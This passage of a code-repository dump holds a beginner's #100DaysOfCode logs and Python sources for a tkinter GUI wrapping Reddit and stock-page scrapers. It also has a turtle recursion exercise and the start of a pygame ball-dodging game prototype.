after like 50! Looking foward to work more on this tomorrow.\n\n**Link(s) to work**: [The GUI, The Reddit Button Function(so far), and A Kinda Updated redditscr.py](https://gist.github.com/JayBk/d323b9cfc27dfcf459811be4ec711c56)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 3 of my <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> ! Working on a GUI for my two "scrapers".. Had a lot of fun today! <a href=\"https://t.co/EZSxybbJJi\">https://t.co/EZSxybbJJi</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/817272316526809088\">January 6, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 2: January 4th 2017\n\n**Today's Progress**: Not much today. Just a program that gets the top 10 new posts from any subreddit using reddits api and relays it back to you.\n\n**Thoughts**: I first wanted to do something using selenium; I wanted to get the last game score for any hockey team that the user wanted.. It wasn't going well at all, so about a half hour in, I scratched it and then decided to do what I did. I plan on making one or two more scraper like programs(note to self: twitter), and put it all into a GUI with buttons for each of them using PyQT. I was going to stop after I scratched the selenium program, but forced myself to think and keep coding. I'm glad I did, and I'm glad I've at least gotten to Day 2! 
:D\n\n**Link(s) to work**: [Get Any Subreddit's 10 Newest Posts](https://gist.github.com/JayBk/02163ac2b69fd80c9a5b615c4fa884d0)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 2 of <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> after 12am again xD Not much today, but I have more planned in the coming days :) <a href=\"https://t.co/emSuuLvoca\">https://t.co/emSuuLvoca</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/816907688626049024\">January 5, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 1: January 3rd 2017\n\n**Today's Progress**: Created a scraper that lets takes the input of a user, but it has to be the stock market abbreviation/name of a company, and scrapes yahoo's financial page for that company, and returns the results in a pandas DataFrame. :). I was going to make it so that it would ask you if you wanted to scrape again but I ran into a lot of trouble doing that for some reason, and it took me way too long to work on that when I wasn't even finished with getting the data into a DataFrame, so I dropped that, and decided to finish the basic functionality of the code. I'm planning to add on to the code as I go along and add more functionality to it. Wish me luck!\n\n**Thoughts**: I have a seperate log that I put in 100-days-of-code/Projects/Day(X) that I write to locally as I run into problems and things. But I will also write my thoughts to this log... I ran into a lot of problems with what I wanted to do today, and kept thinking that I was done, but then ran into another issue. I spent way more than an hour on what I did, and I'm happy I stuck with it and finished the first day :D. They say the hardest part of doing things is taking that first step and getting starting/ commiting to something. I hope that I'll be able to stick with this! Also, it's 12:41am 1/4/2017 right now but as the rules stated, it still counts for the other day because I haven't gone to sleep yet, and I was actually doing the majority of my coding before 12am(it took me a while to finish this project :X). Anyway I can't wait to have some more fun tomorrow! :D\n\n**Link(s) to work**: [Scraper To DataFrame](https://gist.github.com/JayBk/ca177a944edc3a89704d04aa031795c3)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 1 of <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> :D Glad I stuck with my commitment for atleast one day! Not much but I worked hard!<a href=\"https://t.co/DSXZXwZoqz\">https://t.co/DSXZXwZoqz</a> <a href=\"https://t.co/IbAuuhqfKa\">pic.twitter.com/IbAuuhqfKa</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/816522316070973440\">January 4, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 0: January 2nd 2017\n##### (KINDA-When I started writing this it was)\n\n**Today's Progress**: Decided to commit to #100daysofcode, and I'm going to Use Python. Although I might decide to do some freecodecamp projects here and there as I've been wanting to learn Web Development.\n\n**Thoughts:** Well right now it is technically 1/3/2017, 12:05AM at night and I haven't slept yet so It's still technically Day 0. I plan to do my coding tomorrow around 2-6pm. I have an idea of what I want to start working on. 
Since I've been learning Data Science and how to use things like Selenium, and Beautifulsoup; I want to build a project that checks stock market info for tech companies like facebook, google, etc and puts it into a DataFrame(since I'm getting into pandas at the moment). I just got the idea that I could also make it into an alexa app and have alexa get me the stock market values for a certain company I ask for... We'll see :D. \n\n####NOTE TO SELF: During these 100 days would be a good time to work on the what should I wear and other skillets xD\n\n**Link to work:** [Me publicly commiting to #100daysofcode](https://twitter.com/Shablam6/status/816144867432734720)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Starting my <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> tomorrow 1/3/2017! I will be using Python for the 100 days, but I might also add in some <a href=\"https://twitter.com/FreeCodeCamp\">@FreeCodeCamp</a> projects!</p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/816144867432734720\">January 3, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n"
},
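The Day 1 entries in both logs (log.md above and Projects/log.md below) describe the retry loop breaking as soon as .lower() was added to the input. The snippet quoted in Projects/log.md below shows why: it compares strings with `is`, which tests object identity, not equality. Whether two equal strings share one object is a CPython implementation detail (short strings are sometimes cached), so identity checks on user input behave unpredictably — and choice.lower() can return a new object even when the text is unchanged. Comparing with == fixes it; a corrected sketch of that loop:

```python
# Corrected Day 1 retry loop: compare strings with ==, never with `is`.
# (check_stocks is the scraper function from the Day 1 script, assumed in scope.)
while True:
    choice = input('Would you like to search again? (y/n): ').lower()
    if choice == 'y':
        check_stocks()
        break
    if choice == 'n':
        break
    print('Please enter "y" or "n".')
```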
{
"alpha_fraction": 0.7103235721588135,
"alphanum_fraction": 0.7222833633422852,
"avg_line_length": 87.5,
"blob_id": "3cdad81691d445cdc077177b884d992451b8e063",
"content_id": "fa83d41f2fa8d3a9cd3f24c5d1b5ec3a192f8454",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13629,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 154,
"path": "/Projects/log.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "## My personal log that I started writing to locally\n\n##Day 1\n\nDay 1:\n\n```\n again = True\n while again:\n choice = input('Would you like to search again? (y/n): ')\n if choice is 'y':\n check_stocks()\n break\n if choice is 'n':\n search = False\n break\n elif choice is not 'y' or choice is not 'n':\n print('Please Enter \"y\", or \"n\".')\n```\n\nBeen trying this shit forever... I'm done with that for now... I'll incorperate another search again option tomorrow or another day.\nI was also trying to use try and except and using an Exception I created but still couldnt get it to work :/...\n \n**NOTE:** Also, why don't you have the results saved to a file or something like that?\n \nAdding .lower() after the input stuff fucks it up for some reason.. even doing choice = choice.lower() afterwards fucks everything up...\n\nI spent a shitload of time on mydater= pd.Series([x.get_text() for x in tagged_values], index=[t.get_text() for t in tagged_titles])\n \nI kept getting results like:\n ```\n <bound method Tag.get_text of <td class=\"C(black)\" data-reactid=\"352\"><span data-reactid=\"353\">Previous Close</span></td>> 115.05\n \n <bound method Tag.get_text of <td class=\"C(black)\" data-reactid=\"356\"><span data-reactid=\"357\">Open</span></td>> 116.03\n \n <bound method Tag.get_text of <td class=\"C(black)\" data-reactid=\"360\"><span data-reactid=\"361\">Bid</span></td>> 116.65 x 200\n ```\n\nInstead of:\n\n```\nPrevious Close 115.05\n\nOpen 116.03\n\nBid 116.65 x 200\n```\n\nAll because I was using: t.get_text instead of t.get_text() ...\n\nI was also having some trouble getting the text(`get_text()`) for the index's(`tagged_index`) because at first I was trying to append\ntagged_index to titlelist, and then when I was making the DataFrame, tried saying `index=[title.get_text() for title in titlelist]` but\nthat didn't work, so then I tried appending and using get.text at the same time like: `titlelist.append(tagged_index.get_text)` but that\ndidn't work... I kept on getting: `AttributeError: 'ResultSet' object has no attribute 'get_text'`. So I then tried something like \nappending tagged_index to titlelist and then right before making the DataFrame; doing `titlelist = [title.get_text() for title in \ntitlelist]`... But that didn't work lol. I thought for a while and then finally settled on putting it into my datadict like I am with \nthe data itself, and while I add it to the datadict I'm using list comprehension to get_text(), `datadict['titles'] = [i.get_text() \nfor i in tagged_index]` and then I', appending it to my titlelist so I doing it a few different ways but then just settled on putting it\ninto my datadict, using list comprehension, then appending it to my titlelist after that.\n\nNEVERMIND. Still having problems with the index's I want to use for my DataFrame... My titlelist is returning something like this: \n`[['Alphabet Inc. (GOOG)'], ['Facebook, Inc. (FB)']]`, and when I try and create my DataFrame like this:\n`df = pd.DataFrame(datalist, index=titlelist)` I get: `ValueError: Shape of passed values is (16, 3), indices imply (16, 1`).. Which\nI am assuming is from how my titlelist is, I need to fix it.. Asked a friend about this, and he said I should look up list flattening.\nDid some research and found this: `[item for sublist in l for item in sublist]` on stack overflow, going to incorperate that now, and If\ni can get the titles to work... IM DONE(for today). 
Ahh ok, think I got it :D (Thanks Yatri for explaining it to me) I'm going to\nflatten my titlelist right before I make my DataFrame. Wait... Why can't I do that while I'm making the DataFrame? Who said I\ncan't? Well, let me go see if i can!... It does work :D ... So I finally ended up with\n`mydf = pd.DataFrame(datalist, index=[title for sub in titlelist for title in sub])` ... Good :).\n\nWell, that wraps up Day 1 of #100 days of code at 11:55pm on 1/3/2017... This took me much longer than I expected because of the \nproblems I was having incorperating a custom exception for searching again or not, and I was using try: and except: wrong and \n`myinput.lower()` was messing up my `if choice is 'y' ` for some reason, then I forgot parenthesis on `get_text()` and that took me \nabout 30 minutes to figure out lol. Then I was having trouble using `get_text()` for the titlelist and had to figure out how I could do\nthat... and THEN I was having trouble using titlelist, then figured out that it looked like \n`[['Alphabet Inc. (GOOG)'], ['Facebook, Inc. (FB)']]` and then Yatri told me to check out flattening and that was a HUGE help. Now it's\n12:01am hahaa I still have to put this on GitHub. I'd like to also incorperate this into a Jupyter Notebook and put it on GitHub because\nit looks pretty cool.. Now just to figure out how :D.\n\nGoodnight!\n\n\n\n##Day 2:\n\nDAY 2:\nIt's 1:35am in the morning and I have to be up early and I've been having trouble sleeping as it is. I've been coding since about 11:30ish- I was going to use selenium to get hockey scores for whatever team you want\nbut that didn't work out, and by then it was 12, and I was about to say fuck it, but then remembered that I watched a video by sentdex on his reddit worldnews alexa skills app using flask-ask and some other stuff. I\ndid some more research into the reddit api, and came up with the code I have. It let's you enter the exact subreddit you want the first 10 values for and prints it out. My new endgame here is to incorporate what I made\nyesterday, and what I made today, and maybe some more stuff, into a nice object oriented GUI with buttons for each \"scrape\" using PyQT. Today wasn't really a good day, I just wasn't really feeling it, and I wasn't going\nto do the challenge today but I'm glad I stuck with it. Oh, I also made my stock market scraper a little more object oriented so that when I make the PyQT app, it's ready-ish(I'm sure I'll have to make a shitload of \nchanges anyway lol)\n\n##Day 3:\n\nDAY 3:\nOk, maybe i'll get done before 12am today? Doubtful... But I really can't stay up late, I need to try and go to sleep earlier because I've been barely getting any sleep and it's really effecting\nme.. I'm exhausted throughout the day and have been waking up late- which is bad because I have a lot of stuff to do throughout the day even though I'm unemployed at the moment(I have class at night(6-8ish)\nWell, here goes nothing- I'll get started using PyQt, and see what I can get done today :). I also need to work on my Coursera work which I've been slacking on and I don't want to fall behind so I might not go\ntoo much passed an hour today..\nOK, i decided to use tkinter, but I have to write some stuff down real quick:\nSo for both buttons I need to have it so that If you click on it, they'll pop up a new message screen with the message..\nOK- It's 2:05AM... I'm done... I'm having a lot of errors, but I'll work on it more when I wake up. 
Right now I just created the function for the reddit scraping button, and I'm running into trouble importing things,\nI think I'm just too tired to notice shit right now lol. I built the basic GUI, added buttons, labels and entries.. So now I'm just really trying to work on the functionality of the buttons.\n________________________________________________________________________________________________________________________\nErrors that I was running into before I stopped. vvvvvv\n```\nC:\\Users\\jkopp\\Python\\Python35-32\\python.exe C:/Users/jkopp/PycharmProjects/Day1Selenium/gui4scrapes.py\nTraceback (most recent call last):\n  File \"C:/Users/jkopp/PycharmProjects/Day1Selenium/gui4scrapes.py\", line 3, in <module>\n    from scrapeget import *\n  File \"C:\\Users\\jkopp\\PycharmProjects\\Day1Selenium\\scrapeget.py\", line 4, in <module>\n    from gui4scrapes import *\n  File \"C:\\Users\\jkopp\\PycharmProjects\\Day1Selenium\\gui4scrapes.py\", line 19, in <module>\n    redditButton.bind(\"<Button-1\", scrapeReddit())\nAttributeError: 'NoneType' object has no attribute 'bind'\n\nProcess finished with exit code 1\n```\n________________________________________________________________________________________________________________________\n\n## Day 4:\n\nDay 4:\nOkay, 12:06AM, I've been working on my GUI for hours.. I am proud to say the reddit scrape button functionality is FULLY FUNCTIONAL!!!!!! The popup window it makes is pretty nice.. As nice as I can get with some\nsimple font parameters lol.. Anyway, I was so happy when I got that working fully... :D So I moved onto the stock scraping one, which is a little different because I want to display a DataFrame, and there's a\nlot more data than just 10 sentences of headlines like the reddit scrape one.. Also, a DataFrame can get really messy looking and confusing if it isn't displayed right, and I don't want mine to look\nall yucky.. First I tried displaying it the same way as I was displaying the reddit stuff just to see what would happen, and the first things I tried were \"FB GOOG AAPL\", which should've given me back\nFacebook, Google, and Apple's stock market info. For some reason I got a 404... Since I've made and tested the stock scraper I've NEVER gotten a 404 so I was like wtf? For some reason I thought that the way\nI was displaying it was fucking everything up somehow, so I did some research and then decided to try displaying it as Text(window) instead of Message(window)- like how I was displaying the reddit stuff. So\nI went and changed it to use Text, and then spun it up again.. For some reason this time I only typed in 'FB', and of course, it worked.. But something was wrong: Instead of displaying Facebook it was displaying\nFord Motor Company (F), and Barnes Group Inc. (B), for some reason.. [How it Looks Using Text(window)](http://imgur.com/Wvw4zbb) ... And [How it Looks Using Message(window)](http://imgur.com/vqUufAe) This means\nthat it is interpreting every letter it gets as a different \"entry\", so I need to see why and fix that, because the abbreviations are supposed to be separated by spaces, but wait... oh shit..\n I only ever set that up for input() in scraping.py... I never set it up for the Entry() for the gui.. ooohhhh okay. I see now- I'll work on that tomorrow. 
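\nNote to self about that 'NoneType' object has no attribute 'bind' error in the traceback above (rough standalone sketch with a made-up callback -- probably not exactly what the real file will end up as):\n\n```\nfrom tkinter import *\n\ndef scrapereddit():\n    print('clicked')  # placeholder callback just for this sketch\n\nroot = Tk()\n# .grid() and .pack() return None, so never chain them when you need the widget back:\nredditButton = Button(root, text='Scrape Reddit', command=scrapereddit)  # pass the function itself, no ()\nredditButton.grid(row=3, column=0)\n# (also: gui4scrapes importing scrapeget while scrapeget imports gui4scrapes is a circular import -- one side has to go)\nroot.mainloop()\n```\n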
OK, I'm glad I noticed that now :).\n Ok, so tomorrow I need to work on not only the formatting of how to display the DataFrame but I need to also work on how to get the Entry() to work the right way, either like I had it before, or maybe\n they could even be separated by commas... Alright, I'll work on it tomorrow, hopefully I'll get everything uploaded to gist/github and be done by 1:00AM.. It's 12:46 right now.. Day 4 Complete!\n \n## Day 5:\n \nDay 5: **Holy Shit Day 5!?**\n12:09AM D: lol after 12 again! W/e, I accept the fact I'll be done after 12 every day... So today I needed to fix the Entry() and how I was displaying the dataframe, I'll start with the Entry.. I did some\nresearch but I didn't find anything that related to what I had in mind, so I just started messing around with things.. I tried list comprehension, but all that did was throw errors at me, and after some rigging\nI got a list in a list, which I didn't want because I already had to get rid of a list within a list on Day 1 I think when I made this, so no sense bringing it back into a list of a list lol.. I ended up looking\nat scraping.py (the file that scrapes the data) (which I should've done in the first place) and realized that I used .split(\" \") for the input there, and that it would probably work if I implemented it for\n the Entry... Sure as shit it did! Now onto displaying the data.. I tried so many different ways and spent at least an hour and a half researching and implementing random things, trying to install a package\n called pandastable, which kept failing to install because of one of its dependencies; so then I tried to install the dependency first but that was failing to install too. I said fuck it and decided to keep\n trying random things. After a little bit of random implementations again I was at a loss for trying to display the dataframe in a nice way... I decided to try using a pandas series, and a single one came\n out pretty good, so I tried two. When I tried two there was one on top and one on the bottom, and the form was a little messed up, but nothing that I couldn't fix because they were two separate series.\n I tried stuff like adding a newline (\"\\n\") and two tabs (\"\\t\\t\") between the two since I was returning a list of series, and figured I'd just put newlines or tabs to space them apart.. Nice try but no. It\n didn't work out as planned. Again, I was at a loss for how I could properly display my data. Then I thought, well what if I could display each series separately, in its own Message()? To make that work nicely\n I would somehow have to have them all in different columns depending on how many companies a person scrapes... I thought about it for a while and played with some nested for loops, and trying to use all kinds\n of different combinations of using \"and\" between stuff.. Then I finally realized that I could just use two separate for loops using enumerate() so I could have the numbers for the columns and the data for the\n Message (the series), and the Label (the titles). The numbers for the columns needed to match up for the Labels and the Messages, so the Labels are always in row 0, column X, and the Messages are always in\n row 1, column X.. It ended up working and looking beautiful (in my opinion). So that was my Day 5 of 100daysofcode.. I think I may be done with this project now :O I will probably start something new tomorrow!\n"
},
{
"alpha_fraction": 0.6751233339309692,
"alphanum_fraction": 0.6945031881332397,
"avg_line_length": 34.474998474121094,
"blob_id": "d72cedaddedb94d6ecfad462a94b605f2a791685",
"content_id": "aa1c3d85815dcaaca80bfd63ea58d45669cbbc28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2838,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 80,
"path": "/Projects/Gui4Scrapes/gui4scrapes.py",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import ttk\nfrom redditscr import *\nfrom scraping import *\n\n\ndef scrapereddit():\n top = Toplevel()\n top.title('Your Headlines!')\n\n subreddit = redditEntry.get()\n titles = CheckReddit(subreddit)\n redditEntry.delete(0, \"end\")\n showFont = (\"Verdana\", 16)\n Label(top, text='Top headlines in /r/{}!'.format(subreddit), font=(\"Comic Sans MS'\", 24, \"underline\")).pack()\n showPosts = Message(top, text=titles.final, font=showFont)\n showPosts.pack(pady=50)\n # Button(top, text=\"Quit\", command=top.destroy()).pack(side=BOTTOM, fill=X)\n top.focus_force()\n top.mainloop()\n return top\n\n\ndef scrapestocks():\n top2 = Toplevel()\n top2.title('Stock Market Data!')\n # print(stockEntry.get())\n abbrevs = stockEntry.get().split(\" \")\n # print(abbrevs)\n stockData = CheckStocks(abbrevs)\n stockEntry.delete(0, \"end\")\n dFont = (\"Verdana\", 12)\n # myl = Label(top2, text='Stock Market Data For {}!'.format(abbrevs), font=(\"Verdana\", 22, \"underline\"))\n # myl.pack()\n stockPf = stockData.mypf\n stockTi = stockData.titles\n # showStocks = Text(top2)\n # showStocks.pack()\n # showStocks.insert('end', stockDf)\n # showStocks = Message(top2, text=stockDf, font=dFont)\n # showStocks.pack()\n\n for j, title in enumerate(stockTi):\n Label(top2, text='Data for {}.'.format(title), font=(\"Verdana\", 16, \"underline\")).grid(row=0, column=j, padx=25)\n\n for jj, ser in enumerate(stockPf):\n Message(top2, text=ser, font=dFont).grid(row=1, column=jj, padx=25)\n\n top2.focus_force()\n top2.mainloop()\n return top2\n\n\nroot = Tk() # Makes the basic window\nroot.title('GUI 4 Scrapes!')\n\nredditFrame = Frame(root).grid(row=0, column=0, sticky=W, padx=100)\nstockFrame = Frame(root).grid(row=0, column=1, sticky=E, padx=100)\n\nredText = StringVar()\nstockText = StringVar()\n\n# Create the reddit label and button\nredditLabel = Label(redditFrame, textvariable=redText).grid(row=1, column=0, sticky=W)\nredditEntry = Entry(redditFrame)\nredditEntry.grid(row=2, column=0, sticky=W)\nredditButton = Button(redditFrame, text='Scrape Reddit', command=scrapereddit)\nredditButton.grid(row=3, column=0, sticky=W)\n\n# Create the stock label and button\nstockLabel = Label(stockFrame, textvariable=stockText).grid(row=1, column=1, sticky=E)\nstockEntry = Entry(stockFrame, width=30)\nstockEntry.grid(row=2, column=1, sticky=E)\nstockButton = Button(stockFrame, text='Scrape Stocks', command=scrapestocks)\nstockButton.grid(row=3, column=1, sticky=E)\n# Setting the text for the labels(Could also do it when creating label)\nredText.set('Scrape a subreddit\\'s headlines.\\nEnter subreddit name exactly.')\nstockText.set('Get the stock market data for companies.\\nEnter abbreviations separated by a space.')\n\nroot.mainloop() # Keeps the window open until it is closed.\n"
},
{
"alpha_fraction": 0.4294871687889099,
"alphanum_fraction": 0.6858974099159241,
"avg_line_length": 14.600000381469727,
"blob_id": "bd6785bbc2686533950541521612f480273c8d95",
"content_id": "fa94f3d1a3b3e838ae196ebc73f100173de68096",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 10,
"path": "/Projects/Gui4Scrapes/requirements.txt",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "beautifulsoup4==4.5.3\nbs4==0.0.1\nnumpy==1.11.3\npandas==0.19.2\npython-dateutil==2.6.0\npytz==2016.10\nrequests==2.12.4\nsip==4.19\nsix==1.10.0\nUnidecode==0.4.19\n"
}
] | 8 |
notjohnnymalone/CC1-S01
|
https://github.com/notjohnnymalone/CC1-S01
|
ab439cc727d2c5125c0f0f8d108773a719d84929
|
498ee2a4578ab199673a1b4ec1df5b31b00bac8e
|
a0a1b91867e7bdddf9b8c68f150455ab7c908a1e
|
refs/heads/main
| 2023-08-26T02:23:13.481859 | 2021-11-02T05:02:34 | 2021-11-02T05:02:34 | 423,712,147 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7371794581413269,
"alphanum_fraction": 0.7756410241127014,
"avg_line_length": 38,
"blob_id": "6e6ac8d07a6790648e1a18abc4d2d8cf010b7516",
"content_id": "2844d3ce057c63cca7463e66dbbd7bfe3939a259",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 4,
"path": "/README.md",
"repo_name": "notjohnnymalone/CC1-S01",
"src_encoding": "UTF-8",
"text": "# CC1-S01\nThe First part is is the plain CC1-S01 file\nThat explanation and part two is in the txt answers file\npart three is in the file marked part three\n"
},
{
"alpha_fraction": 0.4176570475101471,
"alphanum_fraction": 0.4594227373600006,
"avg_line_length": 27.469999313354492,
"blob_id": "339e3a03499b1c53104de3100fab2df6a9124bb3",
"content_id": "b1ad266fb895f26392c6b31589e16a96afc92194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2945,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 100,
"path": "/cc1-s01_ReidAMartin_.py",
"repo_name": "notjohnnymalone/CC1-S01",
"src_encoding": "UTF-8",
"text": "######################################\r\n###- CC1-S01 Recursion\r\n###- Reid A. Martin\r\n###- October 29, 2021\r\n######################################\r\n#note: programmed with hatred and a cat licking my elbow\r\n#note 2: yes i know this is being drawn backwards... but this is honestly the only way i could get it to work\r\n#AND YOU SAID IT HAD TO PRODUCE SOMETHING SIMILAR NOT EXACT... and no i dont know how i did it...\r\n\r\n#################\r\n\r\nimport turtle #imports turtle module\r\n\r\n##############\r\n\r\ngo = True #sets while variable\r\n\r\nrun = 3 #number of runs variable set\r\nsize = 2 #size? variable set... I used to know what it did\r\n\r\nbranchLen = 40 #sets branch length\r\n\r\n####################\r\n\r\nt = turtle.Turtle() #sets turtle variable\r\nmyWin = turtle.Screen() #sets up screen\r\n\r\nt.left(90) #puts turtle in position and sets his colour\r\nt.color(\"green\")\r\n\r\nwhile go == True: #while loop\r\n\r\n if run == 3:\r\n if size == 2: #draws first branch\r\n t.right(60)\r\n t.backward(10)\r\n t.left(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.right(20)\r\n t.backward(20)\r\n size = size - 1\r\n elif size == 1: #draws second end branch with mid branch\r\n t.left(40)\r\n t.forward(20)\r\n t.right(20)\r\n t.forward(10)\r\n t.backward(10)\r\n t.left(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.right(20)\r\n t.backward(20)\r\n t.right(20)\r\n t.backward(30)\r\n t.left(40)\r\n size = size + 1\r\n run = run - 1\r\n \r\n elif run == 2:\r\n if branchLen >= 10: #draws path of branches on other side\r\n t.forward(branchLen - 10)\r\n branchLen = branchLen - 10\r\n t.left(20) \r\n elif branchLen == 0: #sends turtle back up to finish the branch\r\n branchLen = branchLen + 5\r\n t.right(40)\r\n branchLen = 40\r\n run = run - 1\r\n \r\n elif run == 1:\r\n if size == 2: #takes back to second level of branch to draw one part\r\n t.backward(10)\r\n t.right(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.left(20)\r\n t.backward(20)\r\n t.right(40)\r\n size = size - 1 \r\n elif size == 1: #draws remaining branch\r\n t.forward(20)\r\n t.right(20)\r\n t.forward(10)\r\n t.backward(10)\r\n t.left(40)\r\n t.forward(10)\r\n t.backward(10)\r\n t.right(20)\r\n t.backward(20)\r\n size = size - 1 \r\n else: #takes turtle back home to the bottom\r\n t.left(20)\r\n t.backward(30)\r\n run = run + 10\r\n t.right(20)\r\n t.backward(branchLen)\r\n \r\n else:#ends the while loop\r\n go = False"
},
{
"alpha_fraction": 0.5690072774887085,
"alphanum_fraction": 0.6004842519760132,
"avg_line_length": 25.600000381469727,
"blob_id": "d31b1a8c2ca1529fb5143531f00c415b63696374",
"content_id": "478d9125ad181814fb89eba659e7163179145e7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 826,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 30,
"path": "/cc1-s01_Part3_ReidAMartin_.py",
"repo_name": "notjohnnymalone/CC1-S01",
"src_encoding": "UTF-8",
"text": "###########################\r\n#- CC1-S01 Part Three\r\n#- Reid A. Martin\r\n###########################\r\n\r\n#This program draws what appears to be the first person perspective of looking down a really long tunnel\r\n\r\n\r\nimport turtle\r\nt = turtle.Turtle() \r\nmyWin = turtle.Screen()\r\n\r\n#radius = 100\r\nt.speed(100) #cranks the turtles speed up bc he is just too slow\r\n\r\ndef tunnel(radius): \r\n if radius >= 5: #runs when the radius is greater than or equal to 10\r\n t.circle(radius) # draws a circle\r\n tunnel(radius - 2.5) #runs with the radius being 2.5 units smaller than the last time\r\n \r\ndef main(): #puts the turtle in position (at the bottom of the screen)\r\n t.up()\r\n t.right(90)\r\n t.forward(400)\r\n t.left(90)\r\n t.down()\r\n tunnel(700) #runs the tunnel function\r\n myWin.exitonclick()\r\n \r\nmain()"
}
] | 3 |
betzevim/Game
|
https://github.com/betzevim/Game
|
87c94c8df5cf749432bb356146adfb8aed85a163
|
6529439f7a4f65cf647fe1e9a830fed2d4c55dc3
|
85315ac09b074e78925c72f9cf84df9a59a11ae3
|
refs/heads/master
| 2021-01-21T05:15:14.745364 | 2017-02-26T21:55:06 | 2017-02-26T21:55:06 | 83,160,919 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5520405769348145,
"alphanum_fraction": 0.5897126197814941,
"avg_line_length": 22.40113067626953,
"blob_id": "367c80ea064cf3e4b4a85b45d13c41046f6b4c43",
"content_id": "ed9e431d1b6f58c4eb3b3eda2d2d6def73c66ba1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4141,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 177,
"path": "/gameproto.py",
"repo_name": "betzevim/Game",
"src_encoding": "UTF-8",
"text": "import pygame, math, sys, random\n\nfrom pygame.locals import *\nscreen = pygame.display.set_mode((1280, 748))\n\npygame.init()\n\nclock = pygame.time.Clock()\nFRAMES_PER_SECOND = 30\n\nx = 0\ny = 0\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nfont = pygame.font.SysFont('arial', 18)\n\n\nballs = []\n\nball_rad = 20\n\nx_speed = 0\ny_speed = 0\nx_accel = 0\ny_accel = 0\nfriction = 0.88\n\nlev = 0\n\nlives = 1 # increase this to make the game easier\n\ndef constrain(val, minny, maxxy):\n\tif minny > val: return minny\n\tif maxxy < val: return maxxy\n\treturn val\n\ndef addball(Type):\n\tx = random.randrange(300, screen.get_width() - ball_rad)\n\ty = random.randrange(300, screen.get_height() - ball_rad)\n\tif Type == 1:\n\t\tx = screen.get_width() - 100\n\t\ty = screen.get_height() - 100\n\t\tcolor = (0, 0, 0)\n\tif Type == 2:\n\t\tcolor = (255, 0, 0)\n\tif Type == 3:\n\t\tcolor = (255, 255, 0)\n\tif Type == 4:\n\t\tcolor = (245, 245, 245)\n\tball = {\n\t\t'Type':Type,\n\t\t'color':color,\n\t\t'xsp':5,\n\t\t'ysp':5,\n\t\t'x':x,\n\t\t'y':y\n\t}\n\tballs.append(ball)\n\n\n\nsld = 0\npaused = False\n\ndef reset_balls(lev_up):\n\tdel balls[:]\n\tglobal lev, x, y, font, B_slow, B_live, sld, dmgB\n\tscreen.fill((BLACK))\n\tsld = 1\n\tpygame.display.flip()\n\tclock.tick(FRAMES_PER_SECOND)\n\tscreen.fill(WHITE)\n\tpygame.display.flip()\n\tclock.tick(FRAMES_PER_SECOND)\n\tx_speed = 0\n\ty_speed = 0\n\tif lev_up:\n\t\tlev += 1\n\t\tdmgB = lev\n\t\tB_slow = int(lev / 2) + 1\n\t\tB_live = int(lev / 4) + 1\n\tfor i in range(B_slow):\n\t\taddball(3)\n\tfor i in range(B_live):\n\t\taddball(4)\n\taddball(1)\n\tx = 0\n\ty = 0\n\tfor i in range(dmgB):\n\t\taddball(2)\n\n\ndef change_sp(num):\n\tfor ball in balls:\n\t\tball['xsp'] = num\n\t\tball['ysp'] = num\n\n\nreset_balls(True)\n\nwhile 1:\n\tdeltat = clock.tick(FRAMES_PER_SECOND)\n\tpygame.event.pump()\n\tXkeys = pygame.key.get_pressed()\n\tfor event in pygame.event.get():\n\t\tif event.type == KEYUP:\n\t\t\tif (event.key == K_p or event.key == K_SPACE or event.key 